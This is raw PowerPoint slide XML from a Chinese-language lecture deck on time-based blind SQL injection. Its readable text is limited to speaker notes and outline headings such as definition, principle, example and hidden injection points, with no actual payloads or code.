                <a:ea typeface="Microsoft YaHei UI" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t> 防御方法将了减少反馈信息的输出，但是仅仅是减少直接的信息反馈，往往是不够的。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" baseline="0" dirty="0">
              <a:latin typeface="Microsoft YaHei UI" pitchFamily="34" charset="-122"/>
              <a:ea typeface="Microsoft YaHei UI" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" b="1" baseline="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="1D4999"/>
              </a:solidFill>
              <a:latin typeface="Microsoft YaHei UI" pitchFamily="34" charset="-122"/>
              <a:ea typeface="Microsoft YaHei UI" pitchFamily="34" charset="-122"/>
              <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" baseline="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1D4999"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei UI" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei UI" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>一般在错误注入不能发现注入点时候，会尝试用时间盲注去试探</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="1D4999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Calibri" panose="020F050202020403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6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49037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在上一节中，我们讲到了，初级的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GET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和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POST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型注入都是页面直接的信息反馈获得更进一步的信息的，我们在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" baseline="0" dirty="0">
                <a:latin typeface="Microsoft YaHei UI" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei UI" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t> 防御方法将了减少反馈信息的输出，但是仅仅是减少直接的信息反馈，往往是不够的。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" baseline="0" dirty="0">
              <a:latin typeface="Microsoft YaHei UI" pitchFamily="34" charset="-122"/>
              <a:ea typeface="Microsoft YaHei UI" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" b="1" baseline="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="1D4999"/>
              </a:solidFill>
              <a:latin typeface="Microsoft YaHei UI" pitchFamily="34" charset="-122"/>
              <a:ea typeface="Microsoft YaHei UI" pitchFamily="34" charset="-122"/>
              <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" baseline="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1D4999"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei UI" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei UI" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>一般在错误注入不能发现注入点时候，会尝试用时间盲注去试探</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="1D4999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Calibri" panose="020F050202020403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7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7669952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在上一节中，我们讲到了，初级的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GET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和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POST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型注入都是页面直接的信息反馈获得更进一步的信息的，我们在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" baseline="0" dirty="0">
                <a:latin typeface="Microsoft YaHei UI" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei UI" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t> 防御方法将了减少反馈信息的输出，但是仅仅是减少直接的信息反馈，往往是不够的。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" baseline="0" dirty="0">
              <a:latin typeface="Microsoft YaHei UI" pitchFamily="34" charset="-122"/>
              <a:ea typeface="Microsoft YaHei UI" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" b="1" baseline="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="1D4999"/>
              </a:solidFill>
              <a:latin typeface="Microsoft YaHei UI" pitchFamily="34" charset="-122"/>
              <a:ea typeface="Microsoft YaHei UI" pitchFamily="34" charset="-122"/>
              <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" baseline="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1D4999"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei UI" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei UI" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>一般在错误注入不能发现注入点时候，会尝试用时间盲注去试探</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="1D4999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Calibri" panose="020F050202020403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8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402191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在上一节中，我们讲到了，初级的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GET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和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POST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型注入都是页面直接的信息反馈获得更进一步的信息的，我们在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" baseline="0" dirty="0">
                <a:latin typeface="Microsoft YaHei UI" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei UI" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t> 防御方法将了减少反馈信息的输出，但是仅仅是减少直接的信息反馈，往往是不够的。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" baseline="0" dirty="0">
              <a:latin typeface="Microsoft YaHei UI" pitchFamily="34" charset="-122"/>
              <a:ea typeface="Microsoft YaHei UI" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" b="1" baseline="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="1D4999"/>
              </a:solidFill>
              <a:latin typeface="Microsoft YaHei UI" pitchFamily="34" charset="-122"/>
              <a:ea typeface="Microsoft YaHei UI" pitchFamily="34" charset="-122"/>
              <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" baseline="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1D4999"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei UI" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei UI" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>一般在错误注入不能发现注入点时候，会尝试用时间盲注去试探</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="1D4999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Calibri" panose="020F050202020403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9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4911776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10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1717797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在上一节中，我们讲到了，初级的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GET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和</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="Microsoft YaHei UI" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei UI" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>POST</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="Microsoft YaHei UI" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei UI" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>型注入都是页面直接的信息反馈获得更进一步的信息的，我们在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" baseline="0" dirty="0">
                <a:latin typeface="Microsoft YaHei UI" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei UI" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t> 防御方法将了减少反馈信息的输出，但是仅仅是减少直接的信息反馈，往往是不够的。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" baseline="0" dirty="0">
              <a:latin typeface="Microsoft YaHei UI" pitchFamily="34" charset="-122"/>
              <a:ea typeface="Microsoft YaHei UI" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" b="1" baseline="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="1D4999"/>
              </a:solidFill>
              <a:latin typeface="Microsoft YaHei UI" pitchFamily="34" charset="-122"/>
              <a:ea typeface="Microsoft YaHei UI" pitchFamily="34" charset="-122"/>
              <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" baseline="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1D4999"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei UI" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei UI" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>一般在错误注入不能发现注入点时候，会尝试用时间盲注去试探</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="1D4999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Calibri" panose="020F050202020403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BED20C-72F8-6347-A583-F969C4DCD7E4}" type="slidenum">
              <a:rPr lang="x-none" smtClean="0"/>
              <a:pPr/>
              <a:t>11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906951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EDFCA-6A70-804C-A28F-8578C657E5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F4FBD2-415D-484D-BD25-391B229CD8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DEAD4C-0313-D44F-8F30-F6DED0293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FC6D5-D973-AD44-B167-76FAA6B5DBC4}" type="datetimeFigureOut">
              <a:rPr lang="x-none" altLang="zh-CN" smtClean="0"/>
              <a:pPr/>
              <a:t>2020/7/16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07F97-57CE-994B-9779-177E8B530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2CDC30-71E1-FF4B-9826-C92E71185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1D5A4-0FA2-5942-84AD-8787CEB3F7AA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19340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8D653-50E1-8947-BB05-67F0B8A8C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11C693-EDC2-2B4B-B5CC-413F634BF2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5F9983-B558-0E49-9226-2E0958730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FC6D5-D973-AD44-B167-76FAA6B5DBC4}" type="datetimeFigureOut">
              <a:rPr lang="x-none" altLang="zh-CN" smtClean="0"/>
              <a:pPr/>
              <a:t>2020/7/16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9797BB-531A-0446-931F-1271D6B78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52BF4-DFEE-D349-BE1D-6EC9C3287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1D5A4-0FA2-5942-84AD-8787CEB3F7AA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767000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BB283B-EA97-AC4E-A43F-866A1933B7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547E66-1E8C-9745-A1DB-7045D73DF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8A5CE7-4FC3-934C-BD93-A46CB7654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FC6D5-D973-AD44-B167-76FAA6B5DBC4}" type="datetimeFigureOut">
              <a:rPr lang="x-none" altLang="zh-CN" smtClean="0"/>
              <a:pPr/>
              <a:t>2020/7/16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A9C4F0-3E0B-3545-99D1-0B82ABAF7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ADEFF-4F60-664D-8DB8-B5ECBFBB2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1D5A4-0FA2-5942-84AD-8787CEB3F7AA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0997902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900"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idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1270000" y="1574800"/>
            <a:ext cx="8798986" cy="4648200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t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562713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C350-C356-3944-8DDD-45A082904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4ED4C-7EAB-1943-B402-11D122622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614C9C-C9F9-1B45-86BB-D9B95AFF9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FC6D5-D973-AD44-B167-76FAA6B5DBC4}" type="datetimeFigureOut">
              <a:rPr lang="x-none" altLang="zh-CN" smtClean="0"/>
              <a:pPr/>
              <a:t>2020/7/16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9EECD-D21C-9D44-AD39-BE9C5B9A1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DC8CB-61E6-8143-87DD-05BAED724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1D5A4-0FA2-5942-84AD-8787CEB3F7AA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30880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2F6AE-DBAB-B94C-B7EF-F7A0E2323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839988-D9A1-4C47-91C7-CA676A51DE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FF9EB7-DAD8-8A4F-8AE8-6E61B12AC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FC6D5-D973-AD44-B167-76FAA6B5DBC4}" type="datetimeFigureOut">
              <a:rPr lang="x-none" altLang="zh-CN" smtClean="0"/>
              <a:pPr/>
              <a:t>2020/7/16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C50CD-C997-6B40-B103-7A49D0B49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27B9C2-EA26-8441-A25E-EC065D5A9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1D5A4-0FA2-5942-84AD-8787CEB3F7AA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040242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C8FB2-A947-1444-A88F-280544F45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CEC258-65F8-B84C-878B-45326D8CE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2950B6-0584-9C42-87D1-446C933A44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E0C04D-E78D-2146-96E2-D2305DA31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FC6D5-D973-AD44-B167-76FAA6B5DBC4}" type="datetimeFigureOut">
              <a:rPr lang="x-none" altLang="zh-CN" smtClean="0"/>
              <a:pPr/>
              <a:t>2020/7/16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0FE213-B464-034D-ACF9-0CAB47F24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187A1A-D47F-3E43-BC4C-15ABB5684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1D5A4-0FA2-5942-84AD-8787CEB3F7AA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914931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DB008-4276-9349-B21A-EAB459344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AE9297-1BCD-9646-87F0-90B743E586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2DDB02-BD5F-BC4C-9C23-F7719D7431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3199EF-DEB8-3D4D-BA46-68B1CD9E69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88C5C6-DCCF-5E4A-9528-244AF5B0FB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8B13C9-B10D-8047-83B1-FC9B7A2C6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FC6D5-D973-AD44-B167-76FAA6B5DBC4}" type="datetimeFigureOut">
              <a:rPr lang="x-none" altLang="zh-CN" smtClean="0"/>
              <a:pPr/>
              <a:t>2020/7/16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074D2E-31D8-BD44-A3C8-818623AE7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2556E1-780B-674B-B0BA-F507C2922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1D5A4-0FA2-5942-84AD-8787CEB3F7AA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641363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F92D1-F92A-9D4C-9D9A-31D330BB0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3525B1-177D-C340-9FB6-03D39DE5A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FC6D5-D973-AD44-B167-76FAA6B5DBC4}" type="datetimeFigureOut">
              <a:rPr lang="x-none" altLang="zh-CN" smtClean="0"/>
              <a:pPr/>
              <a:t>2020/7/16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9158FA-76CB-5347-8887-67B84707A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3F8347-4B3F-9841-84C2-F05F791A7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1D5A4-0FA2-5942-84AD-8787CEB3F7AA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03500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B9CAA6-3445-2242-B306-07A30B223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FC6D5-D973-AD44-B167-76FAA6B5DBC4}" type="datetimeFigureOut">
              <a:rPr lang="x-none" altLang="zh-CN" smtClean="0"/>
              <a:pPr/>
              <a:t>2020/7/16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3F361D-86BB-3F46-870B-907BE2A0F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935323-72B1-9141-AB86-A1BB5B737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1D5A4-0FA2-5942-84AD-8787CEB3F7AA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7947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0B288-A74B-B945-821E-E23842DD1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2FDBA-BED2-6A41-B3D7-7FEF37A51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B3D48-61DC-E04C-AA38-3C075904B0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6DCFE4-ABDF-FB49-A06E-12C4972A5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FC6D5-D973-AD44-B167-76FAA6B5DBC4}" type="datetimeFigureOut">
              <a:rPr lang="x-none" altLang="zh-CN" smtClean="0"/>
              <a:pPr/>
              <a:t>2020/7/16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36B0EE-EA77-8E40-A7E1-58BA5C8AE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1BC433-E389-E74D-B1D8-710E313CA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1D5A4-0FA2-5942-84AD-8787CEB3F7AA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683256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96096-D8BB-D846-9821-E5B7E953A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54DF0C-A2B9-DE41-8F0E-87A865DFA5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109720-D6D5-D54A-BE85-7CB39F36EA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83A124-6B87-3E4E-BA89-23C9294B1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FC6D5-D973-AD44-B167-76FAA6B5DBC4}" type="datetimeFigureOut">
              <a:rPr lang="x-none" altLang="zh-CN" smtClean="0"/>
              <a:pPr/>
              <a:t>2020/7/16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4B8180-CCEA-C046-9937-0FB41F3C5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BB50A7-2364-E44D-B7AC-47833AA6B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1D5A4-0FA2-5942-84AD-8787CEB3F7AA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186768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37EF4B-F7E4-794A-8B1B-A02732287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36CE9-4FA3-6B4A-A31D-34B6DBA1C5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5E899A-8385-F748-9B1E-4680D895D1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2FC6D5-D973-AD44-B167-76FAA6B5DBC4}" type="datetimeFigureOut">
              <a:rPr lang="x-none" altLang="zh-CN" smtClean="0"/>
              <a:pPr/>
              <a:t>2020/7/16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9E240D-48E8-4C41-AE33-51F567113E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94A87-E74E-A94F-973F-593EAF9C72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B1D5A4-0FA2-5942-84AD-8787CEB3F7AA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8F1A1BB-0160-E048-849A-16ABD183731B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8266" y="-268546"/>
            <a:ext cx="2173734" cy="1087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55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notesSlide" Target="../notesSlides/notesSlide14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notesSlide" Target="../notesSlides/notesSlide15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notesSlide" Target="../notesSlides/notesSlide21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notesSlide" Target="../notesSlides/notesSlide22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7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image4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22.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://requests.readthedocs.io/en/master/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81D485D-A2E7-4847-9F0D-F9DDC7B43516}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1104900" y="1077123"/>
            <a:ext cx="3536212" cy="47037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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="2" name="Group 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{78F8924F-8B41-6142-955D-1B0C6F6F4A48}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1489006" y="2560042"/>
            <a:ext cx="2438767" cy="1742085"/>
            <a:chOff x="1238250" y="2264138"/>
            <a:chExt cx="2540000" cy="1814399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1C690CBC-8273-D349-8157-7331D1E55C75}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1">
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1238250" y="3670299"/>
              <a:ext cx="2540000" cy="408238"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
          <p:txBody>
            <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t" anchorCtr="0">
              <a:sp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zh-CN" altLang="en-US" b="0" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Alibaba PuHuiTi Medium" pitchFamily="18" charset="-122"/>
                  <a:ea typeface="Alibaba PuHuiTi Medium" pitchFamily="18" charset="-122"/>
                  <a:cs typeface="Alibaba PuHuiTi Medium" pitchFamily="18" charset="-122"/>
                </a:rPr>
                <a:t>时间盲注</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1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endParaRP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BC89281-EF38-C940-9341-B270697335B6}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1238250" y="3349464"/>
              <a:ext cx="7683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6">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A731677F-9513-A24C-ACA0-117DF9B3D8E4}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="1238250" y="2264138"/>
              <a:ext cx="768350" cy="764490"/>
              <a:chOff x="1238250" y="2264138"/>
              <a:chExt cx="768350" cy="764490"/>
            </a:xfrm>
          </p:grpSpPr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83A41969-86DA-C543-A41D-D1E63FA59F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5664" y="2264138"/>
                <a:ext cx="640936" cy="571437"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 166 w 166"/>
                  <a:gd name="T1" fmla="*/ 0 h 148"/>
                  <a:gd name="T2" fmla="*/ 48 w 166"/>
                  <a:gd name="T3" fmla="*/ 148 h 148"/>
                  <a:gd name="T4" fmla="*/ 0 w 166"/>
                  <a:gd name="T5" fmla="*/ 10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6" h="148">
                    <a:moveTo>
                      <a:pt x="166" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="48" y="148"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="100"/>
                    </a:lnTo>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:noFill/>
              <a:ln w="1587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600"/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68DB313F-F047-E446-9ABB-93D70609E1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8250" y="2364526"/>
                <a:ext cx="660243" cy="664102"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 171 w 171"/>
                  <a:gd name="T1" fmla="*/ 62 h 172"/>
                  <a:gd name="T2" fmla="*/ 171 w 171"/>
                  <a:gd name="T3" fmla="*/ 172 h 172"/>
                  <a:gd name="T4" fmla="*/ 0 w 171"/>
                  <a:gd name="T5" fmla="*/ 172 h 172"/>
                  <a:gd name="T6" fmla="*/ 0 w 171"/>
                  <a:gd name="T7" fmla="*/ 0 h 172"/>
                  <a:gd name="T8" fmla="*/ 119 w 171"/>
                  <a:gd name="T9" fmla="*/ 0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172">
                    <a:moveTo>
                      <a:pt x="171" y="62"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="171" y="172"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="172"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="119" y="0"/>
                    </a:lnTo>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:noFill/>
              <a:ln w="15875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600"/>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grp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2E08C75F-1B3A-3E4F-8D42-D1BA5E8FBE2A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5242547" y="2880696"/>
            <a:ext cx="5971047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定义 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&amp;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 原理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4B4B1C2-1090-CC43-867A-DA4F1AB5C235}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4311879" y="2656429"/>
            <a:ext cx="725533" cy="725533"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="1D4999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0</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="20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2</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="20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D4D9AD9-41AC-0342-95E1-88D45D9880DE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4311879" y="3638453"/>
            <a:ext cx="725533" cy="725533"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="1D4999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0</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="20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3</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="20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CD2322A-ECEE-E446-8793-A2B1193347DC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5242547" y="4920190"/>
            <a:ext cx="5971047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隐蔽的盲注点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57D4893-1B52-DD40-A6AC-AB457A1F89BE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4311879" y="4695923"/>
            <a:ext cx="725533" cy="725533"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="1D4999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0</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="20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4</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="20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E592BB7-8F23-574B-961F-6AEAB26B2E56}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5242547" y="3572488"/>
            <a:ext cx="5971046" cy="1432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029ECB9-83CF-D443-B6E5-F388E0F2F301}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5263885" y="4495325"/>
            <a:ext cx="5971046" cy="1432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15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4CD2322A-ECEE-E446-8793-A2B1193347DC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5263885" y="3886389"/>
            <a:ext cx="5971047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示例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B53F37D6-ECF7-3941-9DAC-805B4553BC7A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5230532" y="1799310"/>
            <a:ext cx="5971047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认识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SQL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注入的不同类型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sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="Rectangle 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ED3BC385-8E4E-134A-915A-D9822FD0DA84}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4299864" y="1575043"/>
            <a:ext cx="725533" cy="725533"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="1D4999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01</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="23" name="Straight Connector 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{60638813-4091-D44E-BAEE-328BC9A0B4B6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5230532" y="2491102"/>
            <a:ext cx="5971046" cy="1432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5058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8EA63DA-2AEA-8F40-B1AA-FE830C782EED}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1489006" y="3602111"/>
            <a:ext cx="4401431" cy="700017"/>
            <a:chOff x="1238250" y="3349464"/>
            <a:chExt cx="4584134" cy="729075"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="4" name="Title 1">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{879CBAAF-099F-B447-9374-3EB4085EF4C7}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1">
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1238250" y="3670301"/>
              <a:ext cx="4584134" cy="408238"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:ln>
              <a:noFill/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t" anchorCtr="0">
